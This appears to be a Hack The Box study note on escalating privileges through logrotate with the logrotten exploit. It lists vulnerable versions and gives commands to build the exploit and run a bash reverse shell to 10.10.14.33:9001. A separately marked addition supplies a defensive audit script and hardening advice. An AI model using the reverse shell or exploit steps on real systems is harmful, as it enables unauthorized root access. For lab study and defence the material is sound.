Exploit Logrotate

To exploit logrotate, the following requirements must be met:

  1. we need write permissions on the log files

  2. logrotate must run as a privileged user or root

  3. vulnerable versions:

    • 3.8.6

    • 3.11.0

    • 3.15.0

    • 3.18.0

GitHub - whotwagner/logrotten

Intrusionz3r0@htb[/htb]$ git clone https://github.com/whotwagner/logrotten.git
Intrusionz3r0@htb[/htb]$ cd logrotten
Intrusionz3r0@htb[/htb]$ gcc logrotten.c -o logrotten

# List log files
Intrusionz3r0@htb[/htb]$ cat /var/lib/logrotate.status

# List the available options
Intrusionz3r0@htb[/htb]$ grep "create\|compress" /etc/logrotate.conf | grep -v "#"

# Write payload
Intrusionz3r0@htb[/htb]$ echo 'bash -i >& /dev/tcp/10.10.14.33/9001 0>&1' > payload

Intrusionz3r0@htb[/htb]$ ./logrotten -p ./payload /tmp/tmp.log
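
A defender-side check for the requirements listed at the top, as an added example that is not part of the original notes or of the logrotten project: it flags rotated logs that a non-root user could write to and reports whether the installed logrotate is one of the versions listed on this page. It goes slightly beyond the page by also checking each log's parent directory; the function names, the trusted UID of 0 and the default status file path are assumptions of this example.

```shell
#!/bin/sh
# Added audit example (not from the original page). Assumptions: trusted
# owner is UID 0 (root); the status file uses the '"path" timestamp' format.

# Versions this page lists as vulnerable.
LISTED_VERSIONS="3.8.6 3.11.0 3.15.0 3.18.0"

# Succeeds if the given version string is one of the listed versions.
is_listed_version() {
    for v in $LISTED_VERSIONS; do
        [ "$1" = "$v" ] && return 0
    done
    return 1
}

# Print the log paths recorded in a logrotate status file.
status_log_paths() {
    sed -n 's/^"\(.*\)" [0-9].*$/\1/p' "$1"
}

# Succeeds if the path is owned by someone other than the trusted UID, or is
# group- or world-writable.
loosely_owned() {
    [ -n "$(find "$1" -prune \( ! -user "${TRUSTED_UID:-0}" \
        -o -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Print every rotated log whose file or parent directory is loosely owned.
risky_logs() {
    status_log_paths "$1" | while IFS= read -r log; do
        if loosely_owned "$log" || loosely_owned "$(dirname "$log")"; then
            printf '%s\n' "$log"
        fi
    done
}

# Full report: installed version plus risky log paths.
audit() {
    ver=$(logrotate --version 2>&1 | sed -n 's/^logrotate \([0-9.]*\).*/\1/p')
    is_listed_version "$ver" && echo "logrotate $ver is a listed version"
    risky_logs "${1:-/var/lib/logrotate.status}"
}

# Run only when asked, e.g.: sh audit.sh audit /var/lib/logrotate.status
if [ "${1:-}" = "audit" ]; then audit "${2:-}"; fi
```

Any path it prints is a candidate for tightening: make the log and its directory owned by root and not group- or world-writable, or add an `su` directive so logrotate rotates that log as the owning user instead of root.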
